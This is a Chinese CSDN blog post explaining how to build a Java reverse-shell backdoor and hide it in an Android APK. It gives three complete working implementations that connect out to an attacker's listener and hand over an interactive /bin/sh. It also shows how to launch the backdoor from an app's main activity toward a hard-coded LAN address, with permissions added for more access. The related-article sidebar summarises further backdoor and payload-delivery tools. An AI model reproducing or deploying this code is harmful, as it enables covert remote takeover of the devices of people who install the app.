java reverse 怎么实现_JAVA 后门 shell_reverse_tcp 实现

最新推荐文章于 2024-01-02 16:29:30 发布
最新推荐文章于 2024-01-02 16:29:30 发布
阅读量449 收藏
点赞数
文章标签: java reverse 怎么实现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32021519/article/details/114552258
版权

遇到情景是可以在android上安装任意apk,执行apk后有个反弹shell的效果。一般来说直接用msf就可以生成android后门,但不知为何在目标设备上无法正常使用,故决定自己编写一个简单的apk以完成反弹shell。最终实现三个纯JAVA版的shell_reverse_tcp,当然塞进apk也好使。开始自己完成了一个无法完全交互的shell,类似一句话木马那种伪tty。因为思路也是web的思路,执行->取结果字符串->发送结果字符串。后来参考msf的实现,人家是使用线程直接转发了启动shell的输入输出流到反弹的socket的输入输出流,不仅可以获得一个完全交互的shell,还省去了byte流转字符串的操作。这个其实就是和shellcode的思路一样了,类似dup socket的文件描述符到程序的输入输出流中。二者最重要的区别就是执行顺序上,因为自己对线程不熟,没有想到转发的过程其实是持续的,是伴随着我们对后门的操作的。也是因为自己的编程水平还停留面向过程的1234,不容易想到多个实体一起执行的情景,想的总是执行完第一步,然后第二步…最后找到一个单线程死循环获得完全交互shell的写法,通过判断输入流是否可用来进入转发,是目前看到的最短实现。

非真正交互

都是static方法,故使用的时候不需要new一个新的对象。因为是web思路,执行命令完成,读结果字符串,发结果字符串。所以执行流就是最好想的顺序执行,一步步往下走就行了,类似一句话:

import java.io.BufferedReader;

import java.io.IOException;

import java.io.InputStream;

import java.io.InputStreamReader;

import java.io.OutputStream;

import java.net.Socket;

import java.nio.charset.Charset;

public class Backdoor {

public static String read_stream(InputStream in){

try {

StringBuilder sResultBuilder = new StringBuilder("");

BufferedReader bufferedReader = new BufferedReader(

new InputStreamReader(in, Charset.defaultCharset()));

String line = bufferedReader.readLine();

if (line == null) return "";

sResultBuilder.append(line);

while (true) {

line = bufferedReader.readLine();

if (line == null) break;

else sResultBuilder.append('\n'+line);

}

return String.valueOf(sResultBuilder);

}catch (IOException e) {

e.printStackTrace();

}

return "";

}

public static String exec_cmd(String cmd){

try {

cmd = cmd.replaceAll("\n"," ") + " 2>&1 ;echo \n";

String[] str = {"/bin/sh","-c",cmd};

Process p = Runtime.getRuntime().exec(str);

p.waitFor();

return read_stream(p.getInputStream());

}catch (IOException e) {

e.printStackTrace();

} catch (InterruptedException e) {

e.printStackTrace();

}

return "";

}

public static void reverse_tcp(String ip,int port){

try {

Socket socket = new Socket(ip,port);

InputStream in = socket.getInputStream();

OutputStream out = socket.getOutputStream();

out.write("[+] getshell\n".getBytes());

byte[] b = new byte[4096];

while(true){

out.write("> ".getBytes());

out.write(exec_cmd(new String(b,0,in.read(b))).getBytes());

}

} catch (IOException e) {

e.printStackTrace();

}catch (StringIndexOutOfBoundsException e) {

e.printStackTrace();

}

}

public static void main(String[] args) {

reverse_tcp("127.0.0.1",8888);

}

}

测试用法,本机监听8888端口,然后执行:

➜ javac Backdoor.java && java Backdoor

真正交互

首先想到JAVA自己有没有类似流转发的功能呢?搜索到java io 流重定向标准输入和输出,即JAVA的标准输入输出错误流是可以重定向的,但是没有找到可以重定向任意流的函数。故想到能不能重定向进程的输入输出流之后然后直接execve系统调用把整个进程换成/bin/sh,就完全的shellcode反弹思路。但是看起来java好像不能直接执行系统调用,网上给出的解决办法是写JNI。

所以还是按照msf思路,自己动手写流的转发。看完思路自己默写的时候可犯难了,为啥没有输出呢?调试发现程序卡在了第一个转发那,恍然大悟,人家是转发工作是用线程完成的。所以这种思路就是不是顺序执行啦,而是有几个线程在不停的将反弹的socket的输入输出转发到启动的shell进程的输入输出上,所以这还不太像shellcode,dup文件描述符那么一劳永逸…为了避免拆分文件,最终使用JAVA的内部类完成线程的编写:

后来看:如何利用Java编写反弹工具?,其实整个类都继承自Thread就可以了…

import java.io.IOException;

import java.io.InputStream;

import java.io.OutputStream;

import java.net.Socket;

public class Backdoor {

class forward extends Thread{

private InputStream src;

private OutputStream dst;

public forward(InputStream src,OutputStream dst){

this.src = src; this.dst = dst;

}

public void run(){

try {

final byte[] buf = new byte[4096];

int length;

while ((length = this.src.read(buf)) != -1) {

if (this.dst != null) {

this.dst.write(buf, 0, length);

if (this.src.available() == 0) {

this.dst.flush();

}

}

}

} catch (IOException e) {

e.printStackTrace();

}

}

}

public void reverse_tcp(String ip,int port){

try {

Socket socket = new Socket(ip,port);

InputStream in = socket.getInputStream();

OutputStream out = socket.getOutputStream();

out.write("[+] getshell\n".getBytes());

String[] str = {"/bin/sh","-i"};

Process p = Runtime.getRuntime().exec(str);

new forward(in,p.getOutputStream()).start();

new forward(p.getInputStream(),out).start();

new forward(p.getErrorStream(),out).start();

p.waitFor();

} catch (IOException e) {

e.printStackTrace();

}catch (StringIndexOutOfBoundsException e) {

e.printStackTrace();

} catch (InterruptedException e) {

e.printStackTrace();

}

}

public static void main(String[] args) {

new Backdoor().reverse_tcp("127.0.0.1",8888);

}

}

测试用法,本机监听8888端口,然后执行:

➜ javac Backdoor.java && java Backdoor

最短实现

后来又搜到:使用Java反弹shell,因为我不知道流可以判空,所以之前在写类似的死循环的时候就卡死在read里了,所以直接使用一个线程也是可以完成工作的:

import java.io.IOException;

import java.io.InputStream;

import java.io.OutputStream;

import java.net.Socket;

public class Backdoor {

public static void reverse_tcp(String ip,int port){

try {

String[] str = {"/bin/sh","-i"};

Process p = Runtime.getRuntime().exec(str);

InputStream pin = p.getInputStream();

InputStream perr = p.getErrorStream();

OutputStream pout = p.getOutputStream();

Socket socket = new Socket(ip,port);

InputStream sin = socket.getInputStream();

OutputStream sout = socket.getOutputStream();

sout.write("[+] getshell\n".getBytes());

while(true){

while(pin.available()>0) sout.write(pin.read());

while(perr.available()>0) sout.write(perr.read());

while(sin.available()>0) pout.write(sin.read());

sout.flush();

pout.flush();

}

} catch (IOException e) {

e.printStackTrace();

}catch (StringIndexOutOfBoundsException e) {

e.printStackTrace();

}

}

public static void main(String[] args) {

reverse_tcp("127.0.0.1",8888);

}

}

测试用法,本机监听8888端口,然后执行:

➜ javac Backdoor.java && java Backdoor

android中使用

首先给APK加网络权限,千万别忘了:

如果想让反弹的shell有权限干更多的事则需要多加权限,比如读写SD卡的权限:

然后将Backdoor这个类拷贝进工程中,并把/bin/sh换成/system/bin/sh,因为Andoid是禁止在主线程中使用网络操作,所以之后在程序目标处起一个新的线程即可:

public class MainActivity extends Activity {

@Override

public void onCreate(Bundle savedInstanceState) {

super.onCreate(savedInstanceState);

setContentView(R.layout.activity_main);

new Thread(runnable).start();

}

Runnable runnable = new Runnable(){

@Override

public void run() {

new Backdoor().reverse_tcp("192.168.1.152",8888);

//Backdoor.reverse_tcp("192.168.1.152",8888);

}

};

编译,安装,运行,即可反弹shell。

其他阅读

原亮
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Reverse_TCP_Program:用python编写的反向TCP程序
03-22
反向TCP程序 用python编写的反向TCP程序
deeplink-reverse-tcp:使用简单的Metasploit reverse_tcp有效负载,Microsoft Word和SettingContent-ms文件获得反向连接
05-24
反向链接 需要的东西:Microsoft word(最好是较旧的版本),notepad / notepad ++,Kali vm,Windows reverse_tcp负载和Windows机器 创建有效负载+命令和控制服务器设置 在Kali Linux中创建Windows / Meterpreter / reverse_tcp有效负载 启动Apache服务器 将payload.exe推送到var / www / html 在Windows中修改SettingContent-ms文件 打开记事本/记事本++,然后复制粘贴ILoveWindows.SettingContent-ms 用您的kali本地ip和有效负载可执行文件名称替换“ ” 保存 在Microsoft Word中插入SettingContent-ms文件 打开Microsoft Word,然后转到“插入”->“对象”->
转载内网备忘录
赵一舟的博客
06-01 1273
文章内容没谈snmp利用,可以去乌云等社区获取,没有后续内网持久化,日志处理,bypass uac等内容。Webshell测试主站,搜wooyun历史洞未发现历史洞,github,svn,目录扫描未发现敏感信息,无域传送,端口只开了80端口,找到后台地址,想爆破后台,验证码后台验证,一次性,用ocr识别,找账号,通过google,baidu,bing等搜索,相关邮箱,域名等加常用密码组成字典,发现...
ReverseTcpshell使用教程
m0_53087192的博客
03-11 464
测试环境 攻击机:192.168.50.100 windows10 被攻击:192.168.50.101 windows server 2016 生成payload 使用powershellReverseTCP.ps1运行 设置监听ip,端口 生成两种payload,一种powershell,一种cmd。 复制一个payload,在被攻击机上运行,返回shell。 火绒全程无反应。 ...
Java bindshell/reverseshell pakage
blogfeifei
12-22 140
import java.net.Socket;import java.net.ServerSocket;import java.io.*;import java.util.*;public class back{ static class conn extends Thread{ InputStream is;OutputStream os;public conn(InputStream i...
java键盘记录器源码-backdoorme:强大的自动后门实用程序
06-11
java键盘记录器源码后门 像 metasploit 这样的工具非常适合利用计算机,但是在您获得对计算机的访问权后会发生什么? Backdoorme 通过释放大量后门来建立长期持久性来回答这个问题。 一旦与目标建立了 SSH 连接,Backdoorme 的优势就会显现出来。 不幸的是,Backdoorme 不是获得 root 访问权限的工具 - 只有在获得访问权限后才保留该访问权限。 请仅在获得明确许可的情况下使用 Backdoorme - 请不要未经询问就擅自入侵。 用法 Backdoorme 分为两部分:后门和模块。 后门是一小段代码,它们侦听端口并重定向到解释器,例如 bash。 有许多用各种语言编写的后门以提供多样性。 模块通过更频繁地运行后门,例如每隔几分钟或在计算机启动时使后门更有效。 这有助于建立持久性。 示范: 设置 要启动 backdoorme,首先要确保您拥有所需的依赖项。 对于 Python 3.5+: $ sudo apt-get install python3 python3-pip python3-tk nmap $ cd backdoorme/ $ vir
C2_Server:C2服务器通过反向外壳连接到受害计算机
03-13
攻击者只需要发送反向shell脚本(exploit)并在目标计算机上(以某种方式)执行它即可。 反向外壳程序基本上是注入到trgt机器中的代码,以便目标机器可以单独将发起连接请求发送回攻击者机器,在该机器上C2服务器...
php-reverse-shell
07-24
攻击者只需要修改其中的IP地址和端口,然后将这个文件上传到目标服务器,当该文件被访问时,就能实现反向Shell的连接。 了解并掌握PHP反向Shell的工作原理和防范措施,对于Web开发者和安全专业人员来说至关重要,它...
ReversePowershell:向客户端打开反向 PowerShell 终端。 Shell 通过 TCP 接收命令
06-11
install.bat下载client.ps1脚本(托管在您选择的位置)并执行它,从而安装一个持久的 PowerShell 后门。 攻击者运行server.ps1并向受害者获取反向 PowerShell 提示。 用法 在某处托管 client.ps1 在 client.ps1 ...
反向壳备忘单::upside-down_face:反向壳备忘单:upside-down_face:
01-30
在网络安全领域,特别是渗透测试和红队操作中,反向壳(Reverse Shell)是一种常用的技巧,它允许攻击者在目标系统上建立一个后门,以便远程控制受害主机。本备忘单将深入探讨反向壳的概念、工作原理以及如何在不同...
java-reverse-tcp:用于与远程主机通信的JAR文件和JSP脚本
03-18
Java反向TCP 用于与远程主机通信的JAR文件和JSP脚本。 远程主机将完全控制客户端的外壳及其所有基础命令。 在具有/bin/sh Linux OS和macOS上运行,以及具有cmd.exe Windows OS上运行。程序将自动检测底层操作系统。 与ncat和multi/handler 。 您需要的所有代码都在以下两个文件中: 在Windows 10企业版OS(64位)和Kali Linux v2021.1(64位)上进行了测试。 在Apache NetBeans IDE v12.2(64位)上使用JDK v8构建的,因此所有文件都需要Java SE v8或更高版本才能运行。 出于教育目的。希望对您有所帮助! 要做:Java Web Shell。 怎么跑 从打开首选控制台,然后运行以下命令: java -jar Reverse_Shell.jar 192.168.8.185 90
BT5下利用ms12_004_midi漏洞进行攻击教程
10-29
1. `PAYLOAD`:定义攻击的载荷,这里是`windows/meterpreter/reverse_tcp`。Meterpreter是一个功能强大的交互式后门,能提供一个全面的命令执行环境,让我们可以控制目标系统。 2. `LHOST`:设置回连到的IP地址,即...
基于MIPS的shellcode的reverse tcp调用
chentaoxie的博客
04-24 432
1 在win下使用netcat建立tcp server。 (1) 下载netcat: https://eternallybored.org/misc/netcat/。 软件下载后,会有病毒提示,设置成非病毒包。 (2) 查看帮助信息:使用cmd开命令界面。使用.\nc64.exe -h命令查看帮助信息。 (3) 建立socket监听: .\nc64.exe -L -p 30583 (4) 等待连接… 2 编写shellcode的reverse tcp调用源码 #include <stdio.h&gt
反弹Shell大全与原理
最新发布
weixin_55652418的博客
01-02 1184
more反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
java后门_转:攻击JavaWeb应用[8]-后门
weixin_39541044的博客
02-21 427
转:http://static.hx99.net/static/drops/tips-662.html攻击JavaWeb应用[8]-后门篇园长·2013/10/11 19:190x00 背景关于JavaWeb后门问题一直以来都比较少,而比较新奇的后门更少。在这里我分享几种比较有意思的JavaWeb后门给大家玩。0x01 jspx后门在如今的web应用当中如果想直接传个jsp已经变得比较难了,但...
java后门_Java后门
weixin_42550052的博客
02-12 1304
Java后门?(2009-08-04 13:16:55)标签:it前几天有个人问我,Java能不能写后门。当时忙,没注意,以为说java写病毒,所以没做思考地回了句不合适。闲下来了,又想了下这问题,其实也可以做。不过没什么太大意义,就是拿来练练手而已。前提是目标主机上装有jdk。思路大致如下:1.启个ServerSocket2.将客户端发来的指令通过Runtime的exec()方法执行,将结果返...
msf的reverse_tcp和bind_tcp两者的区别
HoAd'blog
07-31 5565
msf的reverse_tcp和bind_tcp两者的区别reverse_tcpbind_tcpreverse_httpreverse_https安全性 reverse_tcp 攻击机设置一个端口(LPORT)和IP(LHOST),Payload在测试机执行连接攻击机IP的端口,这时如果在攻击机监听该端口会发现测试机已经连接。 msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=0.0.0.0 lport=4444 -f elf -o shell bi
Reverse Shell成功后,提升终端(tty)操作便捷性,设置将tab/ctrl+c等快捷键可以传递给Reverse Shell
b10d9的博客
05-07 294
通过reverse shell建立与目标机器的连接之后,通过以下操作,使得Ctrl+C、TAB等快捷键能够正常使用。 通过python -c 'import pty;pty.spawn("/bin/bash")'建立一个可以交互的终端。 CRTL + Z将进程放入后台。 输入stty raw -echo; fg。(执行命令后,所有的快捷键操作都会直接发送给目标机器,所以比如输入Ctrl+c也不会终止连接,一定程度上也可以防止误操作。fg命令是将后台挂起的连接进程返回前台,必须在一条命令执行,否则前一条的命
metasploit中Payload的reverse_tcp和bind_tcp的区别
热门推荐
04-19 1万+
bind_tcp和reverse_tcp这两者的执行过程可以d
reverse_tcp
09-13
reverse_tcp 是一种常见的网络攻击技术,通常用于远程控制和入侵目标计算机。它的工作原理是,攻击者在目标计算机上部署一个恶意程序,该程序会与攻击者控制的服务器建立一个反向连接。然后,攻击者可以通过该连接...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值